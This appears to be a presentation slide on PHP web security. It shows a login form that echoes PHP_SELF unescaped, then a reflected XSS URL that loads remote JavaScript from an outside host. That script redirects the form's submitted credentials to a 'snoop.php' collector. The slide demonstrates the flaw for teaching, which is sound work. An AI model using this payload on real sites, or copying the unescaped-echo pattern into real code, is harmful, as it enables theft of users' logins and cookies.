| Simple is Hard |
 |
2025-02-26 |
 |
 |
26 |
 |
|
Ok, that is somewhat annoying, but what can actually happen?
Typical Form
<html>
<head><title>My Form</title></head>
<body>
<?php
if($_SERVER['REQUEST_METHOD']=='POST' &&
$_POST['id']=='rasmus' && $_POST['pwd']=='foobar') {
echo "Welcome back ".$_POST['id'];
} else {
?>
<form action="<?php echo $_SERVER['PHP_SELF']?>" method="post">
<input type="text" name="id" />
<input type="password" name="pwd" />
<input type="submit" />
</form>
<? } ?>
</body>
</html>
Hack
http://localhost/form.php/%22%20method=%22POST%22%3E
%3Cscript%20src=%22http://lerdorf.com/txss%22%3E%3C/script%3E%3Cb%20a=%22
Decoded
http://localhost/form.php/" method="POST">
<script src="http://lerdorf.com/txss"></script><b a="
Remote Javascript
function a(event) {
document.forms[0].action = "http://lerdorf.com/snoop.php";
}
function addLoadEvent(func) {
var oldonload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
oldonload();
func();
}
}
}
addLoadEvent(a);
- • Stolen cookies
- • Intercepted POST requests
- • Content injection
- • Invisible requests on behalf of user
